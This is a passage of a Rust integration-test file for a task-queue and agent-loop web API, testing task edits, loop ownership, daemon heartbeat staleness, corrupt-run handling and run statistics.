6847 let queue = f.queue();
6848 let mut task = Task::new(
6849 "old title".to_owned(),
6850 "old instruction".to_owned(),
6851 PathBuf::from("/repo/magi"),
6852 Source::Agent {
6853 run: "20260101-000000-beef".to_owned(),
6854 node: "implement".to_owned(),
6855 },
6856 );
6857 task.runs.push("20260101-000000-beef".to_owned());
6858 queue.put(&mut task).expect("file the task");
6859 let created_at = task.created_at;
6860
6861 let edited = f
6862 .post(
6863 &format!("/api/queue/{}/edit", task.id),
6864 Some(r#"{"title":"new title","instruction":"new instruction"}"#),
6865 )
6866 .await;
6867 assert_eq!(edited.status, 200, "{}", edited.body);
6868 let body = edited.json();
6869 assert_eq!(body["title"], "new title");
6870 assert_eq!(body["instruction"], "new instruction");
6871 assert_eq!(body["id"], task.id, "editing must not mint a new id");
6872 assert_eq!(body["created_at"], created_at.to_string());
6873 assert_eq!(
6874 body["source"]["kind"], "agent",
6875 "editing a task an agent filed must not turn it human: {body}"
6876 );
6877 assert_eq!(body["runs"], serde_json::json!(["20260101-000000-beef"]));
6878
6879 let reloaded = queue.get(&task.id).expect("reload");
6880 assert_eq!(reloaded.title, "new title");
6881 assert_eq!(reloaded.instruction, "new instruction");
6882 }
6883
6884 #[tokio::test]
6885 async fn editing_a_running_task_is_refused_with_a_reason_in_the_response() {
6886 let f = Fixture::start().await;
6887 let queue = f.queue();
6888 let mut task = Task::new(
6889 "in flight".to_owned(),
6890 "do not touch".to_owned(),
6891 PathBuf::from("/repo/magi"),
6892 Source::Human,
6893 );
6894 task.start("20260902-140502-bbbb".to_owned());
6895 queue.put(&mut task).expect("file the task");
6896
6897 let res = f
6898 .post(
6899 &format!("/api/queue/{}/edit", task.id),
6900 Some(r#"{"title":"x","instruction":"y"}"#),
6901 )
6902 .await;
6903 assert_eq!(res.status, 400, "{}", res.body);
6904 assert!(
6905 res.json()["error"]
6906 .as_str()
6907 .is_some_and(|e| e.contains("running")),
6908 "{}",
6909 res.body
6910 );
6911 assert_eq!(
6912 queue.get(&task.id).expect("reload").instruction,
6913 "do not touch",
6914 "the refused edit must not change the file"
6915 );
6916 }
6917
6918 #[tokio::test]
6919 async fn a_claimed_task_refuses_priority_and_edit_the_same_way_it_refuses_hold() {
6920 let f = Fixture::start().await;
6921 let queue = f.queue();
6922 let mut task = Task::new(
6923 "busy".to_owned(),
6924 "Running right now".to_owned(),
6925 PathBuf::from("/repo/magi"),
6926 Source::Human,
6927 );
6928 queue.put(&mut task).expect("file the task");
6929 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6930
6931 let priority = f
6932 .post(
6933 &format!("/api/queue/{}/priority", task.id),
6934 Some(r#"{"priority":9}"#),
6935 )
6936 .await;
6937 assert_eq!(priority.status, 409, "{}", priority.body);
6938
6939 let edit = f
6940 .post(
6941 &format!("/api/queue/{}/edit", task.id),
6942 Some(r#"{"title":"x","instruction":"y"}"#),
6943 )
6944 .await;
6945 assert_eq!(edit.status, 409, "{}", edit.body);
6946 }
6947
6948 #[tokio::test]
6949 async fn done_from_the_phone_keeps_runs_source_and_created_at_unlike_delete() {
6950 let f = Fixture::start().await;
6951 let queue = f.queue();
6952 let mut task = Task::new(
6953 "shipped by hand".to_owned(),
6954 "merged outside the loop".to_owned(),
6955 PathBuf::from("/repo/magi"),
6956 Source::Agent {
6957 run: "20260101-000000-b455".to_owned(),
6958 node: "implement".to_owned(),
6959 },
6960 );
6961 task.runs.push("20260101-000000-b455".to_owned());
6962 task.runs.push("20260101-000000-9af4".to_owned());
6963 queue.put(&mut task).expect("file the task");
6964 let created_at = task.created_at;
6965
6966 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6967 assert_eq!(done.status, 200, "{}", done.body);
6968 assert_eq!(done.json()["status_str"], "done");
6969
6970 let reloaded = queue.get(&task.id).expect("a done task is still on disk");
6971 assert_eq!(
6972 reloaded.runs,
6973 ["20260101-000000-b455", "20260101-000000-9af4"]
6974 );
6975 assert_eq!(
6976 reloaded.source,
6977 Source::Agent {
6978 run: "20260101-000000-b455".to_owned(),
6979 node: "implement".to_owned(),
6980 }
6981 );
6982 assert_eq!(reloaded.created_at, created_at);
6983 }
6984
6985 #[tokio::test]
6986 async fn closing_a_held_task_as_done_from_the_phone_clears_its_hold_reason() {
6987 let f = Fixture::start().await;
6992 let queue = f.queue();
6993 let mut task = Task::new(
6994 "landed while held".to_owned(),
6995 "x".to_owned(),
6996 PathBuf::from("/repo/magi"),
6997 Source::Human,
6998 );
6999 task.hold_manual(Some("waiting on 3ed9".to_owned()));
7000 queue.put(&mut task).expect("file the held task");
7001
7002 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
7003 assert_eq!(done.status, 200, "{}", done.body);
7004 assert_eq!(done.json()["status_str"], "done");
7005 assert!(
7006 done.json()["hold_reason"].is_null(),
7007 "a done task cannot still be waiting on something: {}",
7008 done.body
7009 );
7010 }
7011
7012 #[tokio::test]
7013 async fn done_from_the_phone_supersedes_an_earlier_blocked_attempt() {
7014 let f = Fixture::start().await;
7019 let queue = f.queue();
7020 let runs = f.runs();
7021 write_run(&runs, "20260101-000000-doa1", RunStatus::Blocked);
7022 write_run(&runs, "20260101-000000-doa2", RunStatus::Merged);
7026
7027 let mut task = Task::new(
7028 "landed by hand".to_owned(),
7029 "x".to_owned(),
7030 PathBuf::from("/repo/magi"),
7031 Source::Human,
7032 );
7033 task.runs.push("20260101-000000-doa1".to_owned());
7034 task.runs.push("20260101-000000-doa2".to_owned());
7035 queue.put(&mut task).expect("file the task");
7036
7037 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
7038 assert_eq!(done.status, 200, "{}", done.body);
7039
7040 let reloaded_run = read_run(&runs, "20260101-000000-doa1")
7041 .expect("run still on disk under this fixture's own home");
7042 assert_eq!(
7043 reloaded_run.status,
7044 RunStatus::Superseded,
7045 "closing the task by hand must relabel the earlier blocked attempt exactly \
7046 like the loop's own settle path does"
7047 );
7048 }
7049
7050 #[tokio::test]
7051 async fn done_from_the_phone_does_not_supersede_when_the_last_attempt_never_landed() {
7052 let f = Fixture::start().await;
7057 let queue = f.queue();
7058 let runs = f.runs();
7059 write_run(&runs, "20260101-000000-dob1", RunStatus::Blocked);
7060 write_run(&runs, "20260101-000000-dob2", RunStatus::Failed);
7061
7062 let mut task = Task::new(
7063 "closed with nothing actually landed".to_owned(),
7064 "x".to_owned(),
7065 PathBuf::from("/repo/magi"),
7066 Source::Human,
7067 );
7068 task.runs.push("20260101-000000-dob1".to_owned());
7069 task.runs.push("20260101-000000-dob2".to_owned());
7070 queue.put(&mut task).expect("file the task");
7071
7072 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
7073 assert_eq!(done.status, 200, "{}", done.body);
7074
7075 let reloaded_run = read_run(&runs, "20260101-000000-dob1")
7076 .expect("run still on disk under this fixture's own home");
7077 assert_eq!(
7078 reloaded_run.status,
7079 RunStatus::Blocked,
7080 "the last recorded attempt never landed, so the earlier one must not be \
7081 relabelled as superseded by it"
7082 );
7083 }
7084
7085 #[tokio::test]
7086 async fn unknown_ids_are_json_not_found_on_both_stores() {
7087 let f = Fixture::start().await;
7088
7089 let run = f.get("/api/runs/nosuchrun").await;
7090 let task = f.post("/api/queue/nosuchtask/hold", None).await;
7091
7092 assert_eq!(run.status, 404);
7093 assert_eq!(task.status, 404);
7094 assert!(
7095 run.json()["error"]
7096 .as_str()
7097 .is_some_and(|e| e.contains("run")),
7098 "the error names what was not found: {}",
7099 run.body
7100 );
7101 assert!(
7102 task.json()["error"]
7103 .as_str()
7104 .is_some_and(|e| e.contains("task")),
7105 "the error names what was not found: {}",
7106 task.body
7107 );
7108 }
7109
7110 #[tokio::test]
7111 async fn the_daemon_counts_as_running_only_while_its_heartbeat_is_fresh() {
7112 let f = Fixture::start().await;
7113
7114 let missing = f.get("/api/health").await.json();
7115 assert_eq!(missing["daemon"]["running"], false, "no file, no daemon");
7116
7117 write_daemon(
7118 f.home.path(),
7119 Timestamp::now() - jiff::SignedDuration::from_secs(60),
7120 );
7121 let stale = f.get("/api/health").await.json();
7122 assert_eq!(
7123 stale["daemon"]["running"], false,
7124 "a minute without a heartbeat is a dead daemon, not a busy one"
7125 );
7126 assert!(
7127 stale["daemon"]["stale_for_secs"]
7128 .as_i64()
7129 .is_some_and(|s| s >= 55),
7130 "staleness is reported so the UI can say how long: {stale}"
7131 );
7132
7133 write_daemon(f.home.path(), Timestamp::now());
7134 let fresh = f.get("/api/health").await.json();
7135 assert_eq!(fresh["daemon"]["running"], true);
7136 assert_eq!(fresh["daemon"]["idle"], false);
7137 assert_eq!(fresh["daemon"]["pid"], 4242);
7138 assert_eq!(fresh["daemon"]["completed"], 7);
7139 assert_eq!(
7140 fresh["daemon"]["current"][0]["task"],
7141 "20260902-140501-aaaa"
7142 );
7143 assert_eq!(fresh["version"], env!("CARGO_PKG_VERSION"));
7144 }
7145
7146 #[tokio::test]
7147 async fn the_loop_is_not_running_until_something_starts_it() {
7148 let f = Fixture::start().await;
7149
7150 let view = f.get("/api/loop").await.json();
7151 assert_eq!(view["running"], false);
7152 assert_eq!(
7153 view["owned"], false,
7154 "nobody owns a loop that does not exist: {view}"
7155 );
7156 assert_eq!(view["stopping"], false);
7157 assert_eq!(view["last_error"], Value::Null);
7158 assert_eq!(view["daemon"]["running"], false);
7159 assert_eq!(
7160 view["repo"], "/repo/magi",
7161 "the repository a start would use, named before it is started"
7162 );
7163 }
7164
7165 #[tokio::test]
7166 async fn starting_the_loop_runs_it_in_this_process_and_health_says_the_same() {
7167 let f = Fixture::start().await;
7168
7169 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7170 assert_eq!(res.status, 200, "{}", res.body);
7171 let view = res.json();
7172 assert_eq!(view["running"], true);
7173 assert_eq!(
7174 view["owned"], true,
7175 "the loop the UI started is the UI's own to stop: {view}"
7176 );
7177 assert_eq!(
7178 view["merge"],
7179 Value::Null,
7180 "no override was given, so each repository's own config decides"
7181 );
7182
7183 let health = f.get("/api/health").await.json();
7187 assert_eq!(health["loop"]["running"], true, "{health}");
7188 assert_eq!(health["loop"]["owned"], true, "{health}");
7189
7190 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7191 }
7192
7193 #[tokio::test]
7194 async fn a_second_start_is_refused_rather_than_racing_the_first_for_claims() {
7195 let f = Fixture::start().await;
7196 let first = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7197 assert_eq!(first.status, 200, "{}", first.body);
7198
7199 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7200 assert_eq!(
7201 again.status, 409,
7202 "two loops on one queue race for the same claims: {}",
7203 again.body
7204 );
7205 assert!(
7206 again.json()["error"]
7207 .as_str()
7208 .is_some_and(|e| e.contains("already running the loop")),
7209 "the refusal has to say why: {}",
7210 again.body
7211 );
7212 assert_eq!(
7213 f.get("/api/loop").await.json()["running"],
7214 true,
7215 "and the loop that was already running is untouched by it"
7216 );
7217
7218 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7219 }
7220
7221 #[tokio::test]
7222 async fn stopping_answers_at_once_and_the_loop_settles_stopped() {
7223 let f = Fixture::start().await;
7224 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7225
7226 let res = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7227 assert_eq!(
7228 res.status, 200,
7229 "the answer must not wait for the loop: a run in flight is tens of \
7230 minutes and the operator is holding a phone: {}",
7231 res.body
7232 );
7233
7234 let view = settled(&f, |v| v["running"] == false).await;
7235 assert_eq!(view["owned"], false);
7236 assert_eq!(
7237 view["stopping"], false,
7238 "a loop that has stopped is not still stopping: {view}"
7239 );
7240 assert_eq!(
7241 view["last_error"],
7242 Value::Null,
7243 "a loop that was asked to stop did not fail: {view}"
7244 );
7245
7246 let twice = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7249 assert_eq!(twice.status, 200, "{}", twice.body);
7250 }
7251
7252 #[tokio::test]
7253 async fn a_loop_another_process_owns_can_be_neither_started_nor_stopped_here() {
7254 let f = Fixture::start().await;
7255 write_daemon(f.home.path(), Timestamp::now());
7258
7259 let view = f.get("/api/loop").await.json();
7260 assert_eq!(view["running"], false, "not in this process: {view}");
7261 assert_eq!(view["owned"], false, "and not this process's to control");
7262 assert_eq!(
7263 view["daemon"]["running"], true,
7264 "but a loop is alive somewhere, which is what the UI must say"
7265 );
7266 assert_eq!(view["daemon"]["pid"], 4242);
7267
7268 for body in [r#"{"running":true}"#, r#"{"running":false}"#] {
7269 let res = f.post("/api/loop", Some(body)).await;
7270 assert_eq!(
7271 res.status, 409,
7272 "neither button may pretend to work on someone else's loop: {}",
7273 res.body
7274 );
7275 assert!(
7276 res.json()["error"]
7277 .as_str()
7278 .is_some_and(|e| e.contains("4242")),
7279 "the refusal has to name the process the operator must go to: {}",
7280 res.body
7281 );
7282 }
7283 assert_eq!(
7284 f.get("/api/loop").await.json()["running"],
7285 false,
7286 "and the refusal started nothing"
7287 );
7288 }
7289
7290 #[tokio::test]
7291 async fn a_stale_status_file_is_not_a_foreign_owner() {
7292 let f = Fixture::start().await;
7293 write_daemon(
7294 f.home.path(),
7295 Timestamp::now() - jiff::SignedDuration::from_secs(60),
7296 );
7297
7298 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7299 assert_eq!(
7300 res.status, 200,
7301 "a daemon killed a minute ago must not lock the loop out of its \
7302 own home for good: {}",
7303 res.body
7304 );
7305 assert_eq!(res.json()["running"], true);
7306
7307 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7308 }
7309
7310 #[tokio::test]
7311 async fn loop_rev_moves_on_a_start_so_a_phone_learns_without_polling() {
7312 let f = Fixture::start().await;
7313 let before = f.get("/api/health").await.json()["loop_rev"]
7314 .as_u64()
7315 .expect("a loop revision");
7316
7317 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7318
7319 let after = f.get("/api/health").await.json()["loop_rev"]
7320 .as_u64()
7321 .expect("a loop revision");
7322 assert!(
7323 after > before,
7324 "the loop is in-process state, so this counter is the only thing \
7325 that tells a second device the first one started it: {before} -> \
7326 {after}"
7327 );
7328
7329 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7330 }
7331
7332 #[tokio::test]
7333 async fn a_loop_that_failed_says_why_and_does_not_read_as_running() {
7334 let f = Fixture::with_loop(launch_broken).await;
7335
7336 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7337 assert_eq!(
7338 res.status, 200,
7339 "starting it is not the failure: {}",
7340 res.body
7341 );
7342
7343 let view = settled(&f, |v| v["last_error"].is_string()).await;
7344 assert_eq!(
7345 view["running"], false,
7346 "a loop that died must not read as running, or the operator has \
7347 nothing to press: {view}"
7348 );
7349 assert_eq!(view["owned"], false);
7350 assert!(
7351 view["last_error"]
7352 .as_str()
7353 .is_some_and(|e| e.contains("read-only file system")),
7354 "the phone is where a loop that died at 3am is visible: {view}"
7355 );
7356
7357 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7360 assert_eq!(again.status, 200, "{}", again.body);
7361 assert_eq!(
7362 again.json()["last_error"],
7363 Value::Null,
7364 "a fresh start does not keep showing why the last one died"
7365 );
7366 }
7367
7368 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
7380 async fn the_deck_answers_while_it_parks_and_frees_the_address_first() {
7381 let home = TempDir::new().expect("temp home");
7382 let runs = home.path().join("runs");
7383 std::fs::create_dir_all(&runs).expect("runs dir");
7384 let ui = Ui::new(
7385 Queue::at(home.path().join("queue")),
7386 Questions::at(home.path().join("questions")),
7387 Talks::at(home.path().join("talks")),
7388 runs,
7389 home.path().to_path_buf(),
7390 PathBuf::from("/repo/magi"),
7391 )
7392 .with_worktrees_root(home.path().join("wt"))
7393 .with_launch(launch_knocking_on_the_way_out);
7394 let looping = ui.looping();
7395 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
7396 .await
7397 .expect("bind loopback");
7398 let addr = listener.local_addr().expect("local addr");
7399 *PARK_KNOCK.lock().expect("park knock") = Some(addr);
7400 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
7401
7402 let started = request(addr, "POST", "/api/loop", Some(r#"{"running":true}"#)).await;
7403 assert_eq!(started.status, 200, "the loop starts: {}", started.body);
7404
7405 let bound = std::sync::Mutex::new(None);
7420 hand_over(home.path(), &looping, served, || {
7421 let deadline = std::time::Instant::now() + std::time::Duration::from_secs(5);
7422 let attempt = loop {
7423 match std::net::TcpListener::bind(addr) {
7424 Ok(l) => {
7425 drop(l);
7426 break Ok(());
7427 }
7428 Err(e)
7429 if e.kind() == std::io::ErrorKind::AddrInUse
7430 && std::time::Instant::now() < deadline =>
7431 {
7432 std::thread::sleep(std::time::Duration::from_millis(10));
7433 }
7434 Err(e) => break Err(e.to_string()),
7435 }
7436 };
7437 *bound.lock().expect("bound") = Some(attempt);
7438 Ok(())
7439 })
7440 .await
7441 .expect("hand over");
7442
7443 assert_eq!(
7444 *PARK_HEARD.lock().expect("park heard"),
7445 Some(200),
7446 "the deck must answer while the loop is parking"
7447 );
7448 let attempt = bound
7449 .lock()
7450 .expect("bound")
7451 .take()
7452 .expect("the successor was started");
7453 assert!(
7454 attempt.is_ok(),
7455 "and the address must be free by the time it is: {attempt:?}"
7456 );
7457 }
7458
7459 #[tokio::test]
7460 async fn a_newer_daemon_status_file_still_renders() {
7461 let f = Fixture::start().await;
7462 std::fs::write(
7465 f.home.path().join("daemon.json"),
7466 serde_json::json!({
7467 "schema": 2,
7468 "updated_at": Timestamp::now().to_string(),
7469 "idle": true,
7470 "surprise": { "nested": [1, 2, 3] },
7471 })
7472 .to_string(),
7473 )
7474 .expect("write daemon.json");
7475
7476 let health = f.get("/api/health").await;
7477
7478 assert_eq!(health.status, 200);
7479 assert_eq!(health.json()["daemon"]["running"], true);
7480 }
7481
7482 #[tokio::test]
7483 async fn a_corrupt_run_is_skipped_in_the_list_and_explained_on_its_own_route() {
7484 let f = Fixture::start().await;
7485 write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
7486 let broken = f.runs().join("20260902-140502-bad");
7487 std::fs::create_dir_all(&broken).expect("run dir");
7488 std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
7489
7490 let list = f.get("/api/runs").await;
7491 let detail = f.get("/api/runs/20260902-140502-bad").await;
7492
7493 assert_eq!(list.status, 200);
7494 let listed = list.json();
7495 let ids: Vec<&str> = listed
7496 .as_array()
7497 .expect("an array")
7498 .iter()
7499 .map(|r| r["id"].as_str().expect("an id"))
7500 .collect();
7501 assert_eq!(
7502 ids,
7503 vec!["20260902-140501-good"],
7504 "one unreadable run must not cost the operator the whole history"
7505 );
7506 assert_eq!(detail.status, 500);
7507 assert!(
7508 detail.json()["error"]
7509 .as_str()
7510 .is_some_and(|e| e.contains("run.json")),
7511 "the failure names the file to look at: {}",
7512 detail.body
7513 );
7514 let health = f.get("/api/health").await;
7518 assert_eq!(health.json()["runs_unreadable"], 1);
7519 }
7520
7521 #[tokio::test]
7526 async fn stats_runs_unreadable_matches_health() {
7527 let f = Fixture::start().await;
7528 write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
7529 let broken = f.runs().join("20260902-140502-bad");
7530 std::fs::create_dir_all(&broken).expect("run dir");
7531 std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
7532
7533 let stats = f.get("/api/stats").await;
7534 let health = f.get("/api/health").await;
7535
7536 assert_eq!(stats.status, 200);
7537 assert_eq!(stats.json()["totals"]["runs"], 1);
7538 assert_eq!(stats.json()["runs_unreadable"], 1);
7539 assert_eq!(
7540 stats.json()["runs_unreadable"],
7541 health.json()["runs_unreadable"],
7542 "the dashboard and /api/health must never disagree about how many \
7543 runs could not be read"
7544 );
7545 }
7546
7547 #[tokio::test]
7548 async fn stats_verdict_breakdown_covers_stalled_and_in_progress_runs() {
7549 let f = Fixture::start().await;
7550 write_run(&f.runs(), "20260902-140501-a", RunStatus::Merged);
7551 write_run(&f.runs(), "20260902-140502-b", RunStatus::Stalled);
7552 write_run(&f.runs(), "20260902-140503-c", RunStatus::Implementing);
7553
7554 let totals = &f.get("/api/stats").await.json()["totals"];
7555 assert_eq!(totals["runs"], 3);
7556 assert_eq!(totals["merged"], 1);
7557 assert_eq!(totals["stalled"], 1);
7558 assert_eq!(totals["in_progress"], 1);
7559 assert_eq!(totals["blocked"], 0);
7562 assert_eq!(totals["ready"], 0);
7563 }
7564
7565 #[tokio::test]
7566 async fn stats_queue_counts_come_from_the_live_queue() {
7567 let f = Fixture::start().await;
7568 let q = f.queue();
7569 let mut queued = Task::new(
7570 "queued task".to_owned(),
7571 "do it".to_owned(),
7572 PathBuf::from("/repo"),
7573 Source::Human,
7574 );
7575 q.put(&mut queued).expect("put queued");
7576 let mut held = Task::new(
7577 "held task".to_owned(),
7578 "do it later".to_owned(),
7579 PathBuf::from("/repo"),
7580 Source::Human,
7581 );
7582 held.hold_machine(Some("out of attempts".to_owned()));
7583 q.put(&mut held).expect("put held");
7584
7585 let queue = f.get("/api/stats").await.json()["queue"].clone();
7586 assert_eq!(queue["queued"], 1);
7587 assert_eq!(queue["held"], 1);
7588 assert_eq!(queue["running"], 0);
7589 assert_eq!(queue["done"], 0);
7590 assert_eq!(queue["failed"], 0);
7591 assert_eq!(queue["blocked"], 0);
7592 }
7593
7594 #[tokio::test]
7595 async fn stats_on_an_empty_home_is_all_zero_not_an_error() {
7596 let f = Fixture::start().await;
7597 let stats = f.get("/api/stats").await;
7598 assert_eq!(stats.status, 200);
7599 assert_eq!(stats.json()["totals"]["runs"], 0);
7600 assert_eq!(stats.json()["totals"]["completion_rate"], Value::Null);
7601 assert_eq!(stats.json()["runs_unreadable"], 0);
7602 assert!(stats.json()["agents"].as_array().unwrap().is_empty());
7603 }
7604
7605 #[tokio::test]
7606 async fn a_run_is_summarised_for_the_list_and_served_whole_on_its_own_route() {
7607 let f = Fixture::start().await;
7608 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Ready);
7609
7610 let summary = f.get("/api/runs").await.json();
7611 let row = &summary[0];
7612 assert_eq!(row["short"], "a1b2");
7613 assert_eq!(row["status"], "ready");
7614 assert_eq!(row["done"], true);
7615 assert_eq!(row["title"], "Add a web UI");
7616 assert_eq!(row["repo_name"], "magi");
7617 assert_eq!(row["judges"], 3);
7618 assert_eq!(row["winner"], Value::Null);
7619 assert_eq!(row["reviews"], 0);
7620
7621 let detail = f.get("/api/runs/a1b2").await;
7624 assert_eq!(detail.status, 200);
7625 assert_eq!(detail.json()["base_branch"], "main");
7626 assert_eq!(detail.json()["id"], "20260902-140501-a1b2");
7627 }
7628
7629 #[tokio::test]
7637 async fn a_mode_none_ready_run_is_flagged_unmerged_by_design_everywhere() {
7638 let f = Fixture::start().await;
7639
7640 let mut none_run = RunState::new(
7641 PathBuf::from("/repo/magi"),
7642 "main".to_owned(),
7643 "0123456789abcdef".to_owned(),
7644 "Add a web UI".to_owned(),
7645 Config::default(),
7646 );
7647 none_run.id = "20260902-140503-none".to_owned();
7648 none_run.status = RunStatus::Ready;
7649 none_run.merge = Some(crate::run::MergeOutcome {
7650 mode: crate::config::MergeMode::None,
7651 ok: true,
7652 detail: "git -C /repo merge --no-ff magi/x/A".to_owned(),
7653 });
7654 write_state(&f.runs(), &none_run);
7655
7656 let mut pr_run = RunState::new(
7657 PathBuf::from("/repo/magi"),
7658 "main".to_owned(),
7659 "0123456789abcdef".to_owned(),
7660 "Add a web UI".to_owned(),
7661 Config::default(),
7662 );
7663 pr_run.id = "20260902-140504-prcl".to_owned();
7664 pr_run.status = RunStatus::Ready;
7665 pr_run.merge = Some(crate::run::MergeOutcome {
7666 mode: crate::config::MergeMode::Pr,
7667 ok: false,
7668 detail: "https://example.com/pr/1 was closed without merging".to_owned(),
7669 });
7670 write_state(&f.runs(), &pr_run);
7671
7672 let summary = f.get("/api/runs").await.json();
7673 let rows: std::collections::HashMap<&str, &Value> = summary
7674 .as_array()
7675 .expect("an array")
7676 .iter()
7677 .map(|r| (r["id"].as_str().expect("an id"), r))
7678 .collect();
7679 assert_eq!(rows[none_run.id.as_str()]["status"], "ready");
7680 assert_eq!(
7681 rows[none_run.id.as_str()]["unmerged_by_design"],
7682 true,
7683 "a mode-none Ready must be flagged in the list"
7684 );
7685 assert_eq!(
7686 rows[pr_run.id.as_str()]["unmerged_by_design"],
7687 false,
7688 "a Ready reached by a closed pull request is a different case"
7689 );
7690
7691 let none_detail = f.get(&format!("/api/runs/{}", none_run.id)).await.json();
7692 assert_eq!(none_detail["status"], "ready");
7693 assert_eq!(none_detail["unmerged_by_design"], true);
7694
7695 let pr_detail = f.get(&format!("/api/runs/{}", pr_run.id)).await.json();
7696 assert_eq!(pr_detail["unmerged_by_design"], false);
7697 }
7698
7699 #[tokio::test]
7704 async fn run_detail_reports_active_seats_and_whether_a_daemon_confirms_them() {
7705 let f = Fixture::start().await;
7706 let id = "20260902-140502-bbbb";
7710 let mut state = RunState::new(
7711 PathBuf::from("/repo/magi"),
7712 "main".to_owned(),
7713 "0123456789abcdef".to_owned(),
7714 "Add a web UI".to_owned(),
7715 Config::default(),
7716 );
7717 state.id = id.to_owned();
7718 state.status = RunStatus::Judging;
7719 state.seat_started("judge", "judge-2", std::time::Duration::from_secs(120), 0);
7720 let dir = f.runs().join(id);
7721 std::fs::create_dir_all(&dir).expect("run dir");
7722 std::fs::write(
7723 dir.join("run.json"),
7724 serde_json::to_string_pretty(&state).expect("serialize run"),
7725 )
7726 .expect("write run.json");
7727
7728 let cold = f.get(&format!("/api/runs/{id}")).await.json();
7734 assert_eq!(cold["active"]["judge-2"]["node"], "judge");
7735 assert_eq!(cold["live"], "unknown", "{cold}");
7736
7737 write_daemon(f.home.path(), Timestamp::now());
7740 let warm = f.get(&format!("/api/runs/{id}")).await.json();
7741 assert_eq!(warm["live"], "live", "{warm}");
7742 }
7743
7744 #[tokio::test]
7751 async fn run_detail_reads_a_manual_run_with_a_live_driver_pid_as_live_without_a_daemon() {
7752 let f = Fixture::start().await;
7753 let id = "20260922-090000-cccc";
7754 let mut state = RunState::new(
7755 PathBuf::from("/repo/magi"),
7756 "main".to_owned(),
7757 "0123456789abcdef".to_owned(),
7758 "Review only".to_owned(),
7759 Config::default(),
7760 );
7761 state.id = id.to_owned();
7762 state.status = RunStatus::Reviewing;
7763 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7764 state.driver_pid = Some(std::process::id());
7770 state.driver_started_at = Some(
7771 crate::proc::process_started_at(std::process::id())
7772 .expect("this test process's own start time must be queryable"),
7773 );
7774 let dir = f.runs().join(id);
7775 std::fs::create_dir_all(&dir).expect("run dir");
7776 std::fs::write(
7777 dir.join("run.json"),
7778 serde_json::to_string_pretty(&state).expect("serialize run"),
7779 )
7780 .expect("write run.json");
7781
7782 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7783 assert_eq!(detail["live"], "live", "{detail}");
7784 }
7785
7786 #[tokio::test]
7792 async fn run_detail_reads_a_live_pid_as_dead_once_its_start_time_no_longer_matches() {
7793 let f = Fixture::start().await;
7794 let id = "20260922-090100-dddd";
7795 let mut state = RunState::new(
7796 PathBuf::from("/repo/magi"),
7797 "main".to_owned(),
7798 "0123456789abcdef".to_owned(),
7799 "Review only".to_owned(),
7800 Config::default(),
7801 );
7802 state.id = id.to_owned();
7803 state.status = RunStatus::Reviewing;
7804 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7805 state.driver_pid = Some(std::process::id());
7810 state.driver_started_at = Some("not-this-processes-real-start-time".to_owned());
7811 let dir = f.runs().join(id);
7812 std::fs::create_dir_all(&dir).expect("run dir");
7813 std::fs::write(
7814 dir.join("run.json"),
7815 serde_json::to_string_pretty(&state).expect("serialize run"),
7816 )
7817 .expect("write run.json");
7818
7819 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7820 assert_eq!(detail["live"], "dead", "{detail}");
7821 }
7822
7823 #[test]
7827 fn summarize_asks_about_each_pid_once_and_keeps_the_row_meaning() {
7828 let mk = |id: &str, pid: Option<u32>| {
7829 let mut s = RunState::new(
7830 PathBuf::from("/repo/magi"),
7831 "main".to_owned(),
7832 "0123456789abcdef".to_owned(),
7833 "Add a web UI".to_owned(),
7834 Config::default(),
7835 );
7836 s.id = id.to_owned();
7837 s.driver_pid = pid;
7838 s.driver_started_at = Some("t0".to_owned());
7839 s
7840 };
7841 let states = vec![
7842 mk("20260902-140502-aaaa", Some(77)),
7843 mk("20260902-140502-bbbb", Some(77)),
7844 mk("20260902-140502-cccc", Some(77)),
7845 mk("20260902-140502-dddd", None),
7846 ];
7847 let open: HashSet<String> = ["20260902-140502-bbbb".to_owned()].into();
7848 let claimed: HashSet<String> = ["20260902-140502-dddd".to_owned()].into();
7849 let sup: HashMap<String, String> = [(
7850 "20260902-140502-aaaa".to_owned(),
7851 "20260902-140502-cccc".to_owned(),
7852 )]
7853 .into();
7854
7855 let status_calls = std::cell::Cell::new(0);
7856 let identity_calls = std::cell::Cell::new(0);
7857 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::new(
7858 |_| {
7859 status_calls.set(status_calls.get() + 1);
7860 Some(true)
7861 },
7862 |_| {
7863 identity_calls.set(identity_calls.get() + 1);
7864 Some("t0".to_owned())
7865 },
7866 ));
7867 let rows = summarize(
7868 states,
7869 &open,
7870 &claimed,
7871 &sup,
7872 |p| probe.borrow_mut().status(p),
7873 |p| probe.borrow_mut().started_at(p),
7874 );
7875
7876 assert_eq!(status_calls.get(), 1, "one pid, one status query");
7877 assert_eq!(identity_calls.get(), 1, "one pid, one identity query");
7878 assert_eq!(rows.len(), 4);
7879 assert!(!rows[0].waiting && rows[1].waiting);
